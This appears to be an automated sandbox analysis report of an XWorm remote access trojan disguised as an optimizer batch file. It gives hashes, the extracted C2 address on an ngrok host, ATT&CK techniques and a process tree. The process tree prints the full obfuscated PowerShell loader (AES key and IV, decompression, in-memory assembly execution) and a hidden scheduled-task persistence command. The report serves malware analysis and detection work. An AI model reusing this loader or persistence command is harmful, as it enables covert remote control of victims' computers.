xworm | 17f4fdd88d05fccfec939b0783678bccef1592d7a95c3ab8b134dc0dc4762b7b

Analysis

max time kernel
112s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-01-2025 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OPTIMZERv1 (1).bat
Size

261KB
MD5

4d4e8d39c4cd1f32cd3e4b1864e6e5dd
SHA1

a07908930a166abbbb1025cc61ea42405e244de7
SHA256

17f4fdd88d05fccfec939b0783678bccef1592d7a95c3ab8b134dc0dc4762b7b
SHA512

97d88a8e9689cdfd5747079ce77f1a23eb07f3df998975bd8aa5c198b43cc94d564ab83ddcef717599c2d0530ecf61e78e11236ce851757940340354010bd9ed
SSDEEP

6144:3zlBsZB7WhOwyt/iSfecyYmZwlu7AaGz4Rx/Ch+4LG3:DluZB7WjS3m3E4x/ChbLG3

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

5.tcp.ngrok.io:20448

:20448

Mutex

Ur1UqQ96vApo0dqU

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3284-50-0x000002787B430000-0x000002787B43E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
17	3284	powershell.exe
46	3284	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1536	powershell.exe
2692	powershell.exe
3284	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
16	5.tcp.ngrok.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2692	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1536	powershell.exe
1536	powershell.exe
2692	powershell.exe
2692	powershell.exe
3284	powershell.exe
3284	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeIncreaseQuotaPrivilege	2692	powershell.exe
Token: SeSecurityPrivilege	2692	powershell.exe
Token: SeTakeOwnershipPrivilege	2692	powershell.exe
Token: SeLoadDriverPrivilege	2692	powershell.exe
Token: SeSystemProfilePrivilege	2692	powershell.exe
Token: SeSystemtimePrivilege	2692	powershell.exe
Token: SeProfSingleProcessPrivilege	2692	powershell.exe
Token: SeIncBasePriorityPrivilege	2692	powershell.exe
Token: SeCreatePagefilePrivilege	2692	powershell.exe
Token: SeBackupPrivilege	2692	powershell.exe
Token: SeRestorePrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeSystemEnvironmentPrivilege	2692	powershell.exe
Token: SeRemoteShutdownPrivilege	2692	powershell.exe
Token: SeUndockPrivilege	2692	powershell.exe
Token: SeManageVolumePrivilege	2692	powershell.exe
Token: 33	2692	powershell.exe
Token: 34	2692	powershell.exe
Token: 35	2692	powershell.exe
Token: 36	2692	powershell.exe
Token: SeIncreaseQuotaPrivilege	2692	powershell.exe
Token: SeSecurityPrivilege	2692	powershell.exe
Token: SeTakeOwnershipPrivilege	2692	powershell.exe
Token: SeLoadDriverPrivilege	2692	powershell.exe
Token: SeSystemProfilePrivilege	2692	powershell.exe
Token: SeSystemtimePrivilege	2692	powershell.exe
Token: SeProfSingleProcessPrivilege	2692	powershell.exe
Token: SeIncBasePriorityPrivilege	2692	powershell.exe
Token: SeCreatePagefilePrivilege	2692	powershell.exe
Token: SeBackupPrivilege	2692	powershell.exe
Token: SeRestorePrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeSystemEnvironmentPrivilege	2692	powershell.exe
Token: SeRemoteShutdownPrivilege	2692	powershell.exe
Token: SeUndockPrivilege	2692	powershell.exe
Token: SeManageVolumePrivilege	2692	powershell.exe
Token: 33	2692	powershell.exe
Token: 34	2692	powershell.exe
Token: 35	2692	powershell.exe
Token: 36	2692	powershell.exe
Token: SeIncreaseQuotaPrivilege	2692	powershell.exe
Token: SeSecurityPrivilege	2692	powershell.exe
Token: SeTakeOwnershipPrivilege	2692	powershell.exe
Token: SeLoadDriverPrivilege	2692	powershell.exe
Token: SeSystemProfilePrivilege	2692	powershell.exe
Token: SeSystemtimePrivilege	2692	powershell.exe
Token: SeProfSingleProcessPrivilege	2692	powershell.exe
Token: SeIncBasePriorityPrivilege	2692	powershell.exe
Token: SeCreatePagefilePrivilege	2692	powershell.exe
Token: SeBackupPrivilege	2692	powershell.exe
Token: SeRestorePrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeSystemEnvironmentPrivilege	2692	powershell.exe
Token: SeRemoteShutdownPrivilege	2692	powershell.exe
Token: SeUndockPrivilege	2692	powershell.exe
Token: SeManageVolumePrivilege	2692	powershell.exe
Token: 33	2692	powershell.exe
Token: 34	2692	powershell.exe
Token: 35	2692	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 1536	2676	cmd.exe	84
PID 2676 wrote to memory of 1536	2676	cmd.exe	84
PID 1536 wrote to memory of 2692	1536	powershell.exe	86
PID 1536 wrote to memory of 2692	1536	powershell.exe	86
PID 1536 wrote to memory of 3796	1536	powershell.exe	89
PID 1536 wrote to memory of 3796	1536	powershell.exe	89
PID 3796 wrote to memory of 3360	3796	WScript.exe	90
PID 3796 wrote to memory of 3360	3796	WScript.exe	90
PID 3360 wrote to memory of 3284	3360	cmd.exe	92
PID 3360 wrote to memory of 3284	3360	cmd.exe	92
PID 3284 wrote to memory of 2884	3284	powershell.exe	108
PID 3284 wrote to memory of 2884	3284	powershell.exe	108
PID 2884 wrote to memory of 2692	2884	cmd.exe	110
PID 2884 wrote to memory of 2692	2884	cmd.exe	110

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OPTIMZERv1 (1).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mxcg9g3dqhfJh2LHOAiMFKC2ezynld6F+1nXMXrZ6os='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIYOGT7ZIZov52pmCq9lPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FynMb=New-Object System.IO.MemoryStream(,$param_var); $dWnfC=New-Object System.IO.MemoryStream; $QUmRz=New-Object System.IO.Compression.GZipStream($FynMb, [IO.Compression.CompressionMode]::Decompress); $QUmRz.CopyTo($dWnfC); $QUmRz.Dispose(); $FynMb.Dispose(); $dWnfC.Dispose(); $dWnfC.ToArray();}function execute_function($param_var,$param2_var){ $mBuIh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iofAy=$mBuIh.EntryPoint; $iofAy.Invoke($null, $param2_var);}$XaMWt = 'C:\Users\Admin\AppData\Local\Temp\OPTIMZERv1 (1).bat';$host.UI.RawUI.WindowTitle = $XaMWt;$hFCir=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XaMWt).Split([Environment]::NewLine);foreach ($OBHWI in $hFCir) { if ($OBHWI.StartsWith(':: ')) { $oUBoW=$OBHWI.Substring(3); break; }}$payloads_var=[string[]]$oUBoW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_849_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_849.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_849.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_849.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mxcg9g3dqhfJh2LHOAiMFKC2ezynld6F+1nXMXrZ6os='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIYOGT7ZIZov52pmCq9lPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FynMb=New-Object System.IO.MemoryStream(,$param_var); $dWnfC=New-Object System.IO.MemoryStream; $QUmRz=New-Object System.IO.Compression.GZipStream($FynMb, [IO.Compression.CompressionMode]::Decompress); $QUmRz.CopyTo($dWnfC); $QUmRz.Dispose(); $FynMb.Dispose(); $dWnfC.Dispose(); $dWnfC.ToArray();}function execute_function($param_var,$param2_var){ $mBuIh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iofAy=$mBuIh.EntryPoint; $iofAy.Invoke($null, $param2_var);}$XaMWt = 'C:\Users\Admin\AppData\Roaming\startup_str_849.bat';$host.UI.RawUI.WindowTitle = $XaMWt;$hFCir=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XaMWt).Split([Environment]::NewLine);foreach ($OBHWI in $hFCir) { if ($OBHWI.StartsWith(':: ')) { $oUBoW=$OBHWI.Substring(3); break; }}$payloads_var=[string[]]$oUBoW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp12C3.tmp.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2884
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c0923e8e7765d761022bd427d59e9ca

SHA1
7490e1b19c5662e6339a68ba67920992dbfa3d33

SHA256
299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7

SHA512
a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftetpgdt.j20.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp12C3.tmp.bat

Filesize
171B

MD5
d362bc1f7b9a7cd12572d011cce0b1c1

SHA1
58e1d8b661bdae0723dca2ef9d6ced8f8e7216cf

SHA256
f0482ea7220f66609aa794729d21ee9ddf8b217f6ed137208e97926a12a37eaa

SHA512
15ea0d5405e2a69d6a54ce2cd5b12883858ec04418f7971d4f828305a6f8f0b2b374c5aae1ef9b40a507e149e63dac87201ad6c70eb7ba1399c33ccc3238e83f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_849.bat

Filesize
261KB

MD5
4d4e8d39c4cd1f32cd3e4b1864e6e5dd

SHA1
a07908930a166abbbb1025cc61ea42405e244de7

SHA256
17f4fdd88d05fccfec939b0783678bccef1592d7a95c3ab8b134dc0dc4762b7b

SHA512
97d88a8e9689cdfd5747079ce77f1a23eb07f3df998975bd8aa5c198b43cc94d564ab83ddcef717599c2d0530ecf61e78e11236ce851757940340354010bd9ed

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_849.vbs

Filesize
115B

MD5
2076457525a29189fcaf5887424ae996

SHA1
eb04b8952b25b1bf8de2f39c1d0608dfc9708c6e

SHA256
d69986b0c66c38bab9b8f8b369c807a7a0e7bc812ac0a54a78ad77d1af086b3d

SHA512
250b40c65051b3933cfe0fd9d6575950908a99943383cb3b46d625c5590e2f62f8c1fd6a5e205488883d06cf5b78fcf7e63b16f1f77a9ed67423d1ebf9fc3a88

Download Submit
memory/1536-12-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/1536-14-0x000001A6C7B90000-0x000001A6C7BC4000-memory.dmp

Filesize
208KB

Download
memory/1536-13-0x000001A6C7B60000-0x000001A6C7B68000-memory.dmp

Filesize
32KB

Download
memory/1536-0-0x00007FFBE0C83000-0x00007FFBE0C85000-memory.dmp

Filesize
8KB

Download
memory/1536-11-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/1536-49-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/1536-6-0x000001A6C7930000-0x000001A6C7952000-memory.dmp

Filesize
136KB

Download
memory/2692-25-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/2692-26-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/2692-27-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/2692-30-0x00007FFBE0C80000-0x00007FFBE1741000-memory.dmp

Filesize
10.8MB

Download
memory/3284-50-0x000002787B430000-0x000002787B43E000-memory.dmp

Filesize
56KB

Download
memory/3284-51-0x000002787B3C0000-0x000002787B3CC000-memory.dmp

Filesize
48KB

Download